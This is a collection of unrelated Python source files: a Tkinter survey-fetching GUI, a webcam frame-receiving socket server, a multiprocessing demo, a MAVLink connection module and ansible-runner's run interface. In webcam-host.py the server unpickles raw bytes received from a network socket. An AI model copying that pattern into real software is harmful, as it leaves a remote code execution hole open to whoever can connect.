extent = [float(self.bee.get()),float(self.bew.get()),float(self.bes.get()),float(self.ben.get())]
self.nl.bfilter(extent)
self._listBoxUpdate()
def yrfilterSurveys(self):
self.yw.destroy()
self.nl.yrfilter(self.by.get(), self.ey.get())
self._listBoxUpdate()
def resetDataType(self):
self.nl._reset_dtypes()
for i in self.nl._dtypes:
self.data_types[i].set(1)
print("Datatypes: %s" %(self.nl._dtypes))
def toggleDataTypes(self, evt):
for i in self.data_types:
if self.dtt: dti = 0
else: dti = 1
self.data_types[i].set(dti)
self.dtt = not self.dtt
def setDataType(self):
self.w = tk.Toplevel(class_="test")
self.w.title("Datatype")
self.typeCheckFrame = tk.LabelFrame(self.w, text="Data Type")
self.typeCheckFrame.bind('<Button-1>', self.toggleDataTypes)
self.typeCheckFrame.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
for h,i in enumerate(self.data_types):
if h <= 4:
tk.Checkbutton(self.typeCheckFrame, text=i, indicatoron=1, variable=self.data_types[i]).grid(column=0,row=h,sticky=tk.W)
else: tk.Checkbutton(self.typeCheckFrame, text=i, indicatoron=1, variable=self.data_types[i]).grid(column=1,row=h-5,sticky=tk.W)
tk.Checkbutton(self.typeCheckFrame, text="XYZ", indicatoron=1, variable=self.data_types["GEODAS"]).grid(column=1,row=len(self.data_types)-5,sticky=tk.W)
self.typeCheckOK = tk.Button(self.w, text="OK", command=self._typeCheckChange)
self.typeCheckOK.grid(sticky=tk.N+tk.S+tk.E+tk.W)
def _typeCheckChange(self):
self.w.destroy()
dts = []
for i in self.data_types:
if self.data_types[i].get() == 1:
dts.append(i)
self.nl._set_dtypes(dts)
print("Datatypes: %s" %(self.nl._dtypes))
def setFetchDir(self):
nosDir = tkFileDialog.askdirectory(title="Select A Folder", mustexist=0)
if nosDir: noslib._set_out_dir(nosDir)
print("Fetch Directory: %s" %(noslib._out_dir))
def resetFetchDir(self):
noslib._set_out_dir(expanduser("~"))
print("Fetch Directory: %s" %(noslib._out_dir))
def runUpdate(self):
def callback():
nbOb = noslib.nosBounds()
self.downloading.set("updating")
for i in noslib._nos_directories:
sl = nbOb._readDir(i)
for j in sl:
nbOb._updateLines(j)
nbOb._write()
self.downloading.set("idle")
t = threading.Thread(target=callback)
t.start()
def updateSurveys(self):
print("updating")
self.runUpdate()
if __name__ == '__main__':
root = tk.Tk()
app = Application(root)
app.master.title('NOS-Fetch')
#imgicon = tk.PhotoImage(file=os.path.join('./','favicon.ico'))
#app.master.tk.call('wm', 'iconphoto', app.master._w, imgicon)
#app.master.iconbitmap(os.path.join('./', 'favicon.ico'))
root.mainloop()
|
webcam-host.py
|
import cv2
import socket
import struct
import pickle
from pynput.keyboard import Key, Listener, Controller
import threading
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
streaming = True
break_streaming = False
HOST = socket.gethostname()
PORT = 8081
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
data = b""
payload_size = struct.calcsize("L")
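# Wire format expected from the client: each frame is length-prefixed with a native
# unsigned long ("L") giving the size of the pickled OpenCV frame that follows.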
keyboard = Controller()
def get_keyboard_input():
global streaming
def on_press(key):
        global streaming, break_streaming  # declare both so the flags set below are module-level
if key == Key.esc:
print(streaming)
streaming = False
break_streaming = True
return False
with Listener(on_press=on_press) as listener:
listener.join()
keypresses = threading.Thread(target=get_keyboard_input)
keypresses.start()
while streaming:
while len(data) < payload_size and not break_streaming:
data += conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
cv2.imshow("frame", frame)
cv2.waitKey(1)
conn.close()
print("ENDING STREAM")
cv2.destroyAllWindows()
|
multi.py
|
import time
import multiprocessing
def sum_1_to(n, i):
'''
    A time-consuming cumulative sum.
'''
print('start: {}'.format(i))
start = time.time()
r = 0
    for x in range(n):  # use a separate loop variable so the task id `i` is not overwritten
        r += x
end = time.time()
print('end {}: {}s'.format(i, end - start))
return r
def new_process(target, args):
'''
    Start a new worker process.
'''
process = multiprocessing.Process(target=target, args=args)
process.start()
return process
def main():
'''
    Because of the GIL, the CPython interpreter executes bytecode from only one thread at a time
    (older interpreters switched threads roughly every 100 bytecode instructions),
    so multiple processes are used here to get real parallelism.
'''
    # 'spawn' only runs the code related to the target argument or the run() method; Windows supports only this mode.
    # 'fork'
    # 'forkserver', Unix only.
multiprocessing.set_start_method('spawn')
for i in range(4):
new_process(target=sum_1_to, args=(100000000, i))
    # Any input in the main process exits.
    input('press Enter to exit:\n')
if __name__ == '__main__':
main()
|
mavlink.py
|
from __future__ import print_function
import logging
import time
import socket
import errno
import sys
import os
import platform
import copy
from dronekit import APIException
from pymavlink import mavutil
from queue import Queue, Empty
from threading import Thread
if platform.system() == 'Windows':
from errno import WSAECONNRESET as ECONNABORTED
else:
from errno import ECONNABORTED
class MAVWriter(object):
"""
Indirection layer to take messages written to MAVlink and send them all
on the same thread.
"""
def __init__(self, queue):
self._logger = logging.getLogger(__name__)
self.queue = queue
def write(self, pkt):
self.queue.put(pkt)
def read(self):
self._logger.critical('writer should not have had a read request')
os._exit(43)
class mavudpin_multi(mavutil.mavfile):
'''a UDP mavlink socket'''
def __init__(self, device, baud=None, input=True, broadcast=False, source_system=255, source_component=0, use_native=mavutil.default_native):
self._logger = logging.getLogger(__name__)
a = device.split(':')
if len(a) != 2:
self._logger.critical("UDP ports must be specified as host:port")
sys.exit(1)
self.port = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udp_server = input
self.broadcast = False
self.addresses = set()
if input:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port.bind((a[0], int(a[1])))
else:
self.destination_addr = (a[0], int(a[1]))
if broadcast:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.broadcast = True
mavutil.set_close_on_exec(self.port.fileno())
self.port.setblocking(False)
mavutil.mavfile.__init__(self, self.port.fileno(), device, source_system=source_system, source_component=source_component, input=input, use_native=use_native)
def close(self):
self.port.close()
def recv(self, n=None):
try:
try:
data, new_addr = self.port.recvfrom(65535)
except socket.error as e:
if e.errno in [errno.EAGAIN, errno.EWOULDBLOCK, errno.ECONNREFUSED]:
return ""
if self.udp_server:
self.addresses.add(new_addr)
elif self.broadcast:
self.addresses = {new_addr}
return data
except Exception:
self._logger.exception("Exception while reading data", exc_info=True)
def write(self, buf):
try:
try:
if self.udp_server:
for addr in self.addresses:
self.port.sendto(buf, addr)
else:
if len(self.addresses) and self.broadcast:
                        self.destination_addr = next(iter(self.addresses))  # addresses is a set, so take an arbitrary element
self.broadcast = False
self.port.connect(self.destination_addr)
self.port.sendto(buf, self.destination_addr)
except socket.error:
pass
except Exception:
self._logger.exception("Exception while writing data", exc_info=True)
def recv_msg(self):
'''message receive routine for UDP link'''
self.pre_message()
s = self.recv()
if len(s) > 0:
if self.first_byte:
self.auto_mavlink_version(s)
m = self.mav.parse_char(s)
if m is not None:
self.post_message(m)
return m
class MAVConnection(object):
def stop_threads(self):
if self.mavlink_thread_in is not None:
self.mavlink_thread_in.join()
self.mavlink_thread_in = None
if self.mavlink_thread_out is not None:
self.mavlink_thread_out.join()
self.mavlink_thread_out = None
def __init__(self, ip, baud=115200, target_system=0, source_system=255, source_component=0, use_native=False):
self._logger = logging.getLogger(__name__)
if ip.startswith("udpin:"):
self.master = mavudpin_multi(ip[6:], input=True, baud=baud, source_system=source_system, source_component=source_component)
else:
self.master = mavutil.mavlink_connection(ip, baud=baud, source_system=source_system, source_component=source_component)
# TODO get rid of "master" object as exposed,
# keep it private, expose something smaller for dronekit
self.out_queue = Queue()
self.master.mav = mavutil.mavlink.MAVLink(
MAVWriter(self.out_queue),
srcSystem=self.master.source_system,
srcComponent=self.master.source_component,
use_native=use_native)
# Monkey-patch MAVLink object for fix_targets.
sendfn = self.master.mav.send
def newsendfn(mavmsg, *args, **kwargs):
self.fix_targets(mavmsg)
return sendfn(mavmsg, *args, **kwargs)
self.master.mav.send = newsendfn
# Targets
self.target_system = target_system
# Listeners.
self.loop_listeners = []
self.message_listeners = []
# Debug flag.
self._accept_input = True
self._alive = True
self._death_error = None
import atexit
def onexit():
self._alive = False
self.stop_threads()
atexit.register(onexit)
def mavlink_thread_out():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
try:
msg = self.out_queue.get(True, timeout=0.01)
self.master.write(msg)
except Empty:
continue
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during read')
raise
except Exception as e:
self._logger.exception('mav send error: %s' % str(e))
break
except APIException as e:
self._logger.exception("Exception in MAVLink write loop", exc_info=True)
self._alive = False
self.master.close()
self._death_error = e
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
# Explicitly clear out buffer so .close closes.
self.out_queue = Queue()
def mavlink_thread_in():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
# Loop listeners.
for fn in self.loop_listeners:
fn(self)
# Sleep
self.master.select(0.05)
while self._accept_input:
try:
msg = self.master.recv_msg()
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during send')
raise
except mavutil.mavlink.MAVError as e:
# Avoid
# invalid MAVLink prefix '73'
# invalid MAVLink prefix '13'
self._logger.debug('mav recv error: %s' % str(e))
msg = None
except Exception:
# Log any other unexpected exception
self._logger.exception('Exception while receiving message: ', exc_info=True)
msg = None
if not msg:
break
# Message listeners.
for fn in self.message_listeners:
try:
fn(self, msg)
except Exception:
self._logger.exception(
'Exception in message handler for %s' % msg.get_type(),
exc_info=True
)
except APIException as e:
self._logger.exception('Exception in MAVLink input loop')
self._alive = False
self.master.close()
self._death_error = e
return
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
t = Thread(target=mavlink_thread_in)
t.daemon = True
self.mavlink_thread_in = t
t = Thread(target=mavlink_thread_out)
t.daemon = True
self.mavlink_thread_out = t
def reset(self):
self.out_queue = Queue()
if hasattr(self.master, 'reset'):
self.master.reset()
else:
try:
self.master.close()
except:
pass
self.master = mavutil.mavlink_connection(self.master.address)
def fix_targets(self, message):
"""Set correct target IDs for our vehicle"""
if hasattr(message, 'target_system') and message.target_system < 0:
message.target_system = self.target_system
def forward_loop(self, fn):
"""
Decorator for event loop.
"""
self.loop_listeners.append(fn)
def forward_message(self, fn):
"""
Decorator for message inputs.
"""
self.message_listeners.append(fn)
def start(self):
if not self.mavlink_thread_in.is_alive():
self.mavlink_thread_in.start()
if not self.mavlink_thread_out.is_alive():
self.mavlink_thread_out.start()
def close(self):
# TODO this can block forever if parameters continue to be added
self._alive = False
while not self.out_queue.empty():
time.sleep(0.1)
self.stop_threads()
self.master.close()
def pipe(self, target):
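        # Cross-wire the two connections: messages received on this link are re-packed
        # onto `target`'s out queue, and messages received by `target` are forwarded
        # back onto this link, so `target` acts as a transparent relay.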
target.target_system = self.target_system
# vehicle -> self -> target
@self.forward_message
def callback(_, msg):
try:
target.out_queue.put(msg.pack(target.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
target.out_queue.put(msg.get_msgbuf())
except:
self._logger.exception('Could not pack this object on receive: %s' % type(msg), exc_info=True)
# target -> self -> vehicle
@target.forward_message
def callback(_, msg):
msg = copy.copy(msg)
target.fix_targets(msg)
try:
self.out_queue.put(msg.pack(self.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
self.out_queue.put(msg.get_msgbuf())
except:
self._logger.exception('Could not pack this object on forward: %s' % type(msg), exc_info=True)
return target
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import json
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.config.runner import RunnerConfig
from ansible_runner.config.command import CommandConfig
from ansible_runner.config.inventory import InventoryConfig
from ansible_runner.config.ansible_cfg import AnsibleCfgConfig
from ansible_runner.config.doc import DocConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
santize_json_response
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
# If running via the transmit-worker-process method, we must only extract things as read-only
# inside of one of these commands. That could be either transmit or worker.
if not kwargs.get('cli_execenv_cmd') and (kwargs.get('streamer') not in ('worker', 'process')):
dump_artifacts(kwargs)
if kwargs.get('streamer'):
# undo any full paths that were dumped by dump_artifacts above in the streamer case
private_data_dir = kwargs['private_data_dir']
project_dir = os.path.join(private_data_dir, 'project')
playbook_path = kwargs.get('playbook') or ''
if os.path.isabs(playbook_path) and playbook_path.startswith(project_dir):
kwargs['playbook'] = os.path.relpath(playbook_path, project_dir)
inventory_path = kwargs.get('inventory') or ''
if os.path.isabs(inventory_path) and inventory_path.startswith(private_data_dir):
kwargs['inventory'] = os.path.relpath(inventory_path, private_data_dir)
roles_path = kwargs.get('envvars', {}).get('ANSIBLE_ROLES_PATH') or ''
if os.path.isabs(roles_path) and roles_path.startswith(private_data_dir):
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = os.path.relpath(roles_path, private_data_dir)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
pi_executable = kwargs.get("process_isolation_executable", "podman")
if not check_isolation_executable_installed(pi_executable):
print(f'Unable to find process isolation executable: {pi_executable}')
sys.exit(1)
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
streamer = kwargs.pop('streamer', None)
if streamer:
if streamer == 'transmit':
stream_transmitter = Transmitter(**kwargs)
return stream_transmitter
if streamer == 'worker':
stream_worker = Worker(**kwargs)
return stream_worker
if streamer == 'process':
stream_processor = Processor(event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback,
**kwargs)
return stream_processor
kwargs.pop('_input', None)
kwargs.pop('_output', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param forks: Control Ansible parallel concurrency
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
:param _input: An optional file or file-like object for use as input in a streaming pipeline
:param _output: An optional file or file-like object for use as output in a streaming pipeline
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir. (default: None)
:param container_options: List of container options to pass to execution engine.
:param resource_profiling: Enable collection of resource utilization data during playbook execution.
:param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
:param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
:param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
:param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
:param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
:param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
:param cli_execenv_cmd: Tells Ansible Runner to emulate the CLI of Ansible by prepping an Execution Environment and then passing the user provided cmdline
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type limit: str
:type forks: int
:type quiet: bool
:type verbosity: int
:type streamer: str
:type _input: file
:type _output: file
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type resource_profiling: bool
:type resource_profiling_base_cgroup: str
:type resource_profiling_cpu_poll_interval: float
:type resource_profiling_memory_poll_interval: float
:type resource_profiling_pid_poll_interval: float
:type resource_profiling_results_dir: str
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:type omit_event_data: bool
:type only_failed_event_data: bool
:type cli_execenv_cmd: str
:returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
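# Example usage (a minimal sketch; the private_data_dir path and playbook name
# are hypothetical):
#
#   thread, runner = ansible_runner.run_async(private_data_dir='/tmp/demo',
#                                             playbook='site.yml')
#   thread.join()                  # wait for the background run to finish
#   print(runner.status)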
def init_command_config(executable_cmd, cmdline_args=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run_command() and run_command_async()
functions in the same way and return a valid instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run_command`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rc = CommandConfig(**kwargs)
rc.prepare_run_command(executable_cmd, cmdline_args=cmdline_args)
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run_command(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) command in the foreground and return the response and error output when complete.
:param executable_cmd: The command to be executed.
:param cmdline_args: A list of arguments to be passed to the executable command.
:param input_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``; it provides the
input file descriptor used to interact with the sub-process running the command.
:param output_fd: The output file descriptor to stream the output of command execution.
:param error_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``; it provides the
error file descriptor used to read the errors received while executing the command.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. If the ``input_fd`` parameter
is set or the executable command is one of ``ansible-config``, ``ansible-doc`` or ``ansible-galaxy``,
the default is ``subprocess``; otherwise it is ``pexpect``.
:param cwd: The current working directory from which the command in executable_cmd should be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type executable_cmd: str
:type cmdline_args: list
:type input_fd: file descriptor
:type output_fd: file descriptor
:type error_fd: file descriptor
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. If ``runner_mode`` is set to ``pexpect``, the error value is empty as
``pexpect`` uses the same output descriptor for stdout and stderr.
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error
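# Example usage (a minimal sketch; the output depends on the local Ansible installation):
#
#   out, err = ansible_runner.run_command(executable_cmd='ansible-doc',
#                                         cmdline_args=['-l'])
#   print(out)                     # listing produced by 'ansible-doc -l'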
def run_command_async(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) command in the background; it starts immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run_command`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
def init_plugin_docs_config(plugin_names, plugin_type=None, response_format=None,
snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both get_plugin_docs() and get_plugin_docs_async()
functions in the same way and return a valid instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.get_plugin_docs`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_docs_command(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path)
return Runner(rd, event_handler=event_callback_handler, status_handler=status_callback_handler, artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback, finished_callback=finished_callback)
def get_plugin_docs(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get plugin docs in the foreground and return the response and error output when complete.
:param plugin_names: The names of the plugins to get docs for.
:param plugin_type: The type of the plugins mentioned in plugin_names. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param response_format: The output format for the response. Valid values are ``json`` or ``human``, and the response
is either a json string or plain text in human readable format. Default value is ``json``.
:param snippet: Show the playbook snippet for the specified plugin(s).
:param playbook_dir: Sets the relative path to handle playbook-adjacent installed plugins.
:param module_path: Prepends the given colon-separated path(s) to the module library
(default: ~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
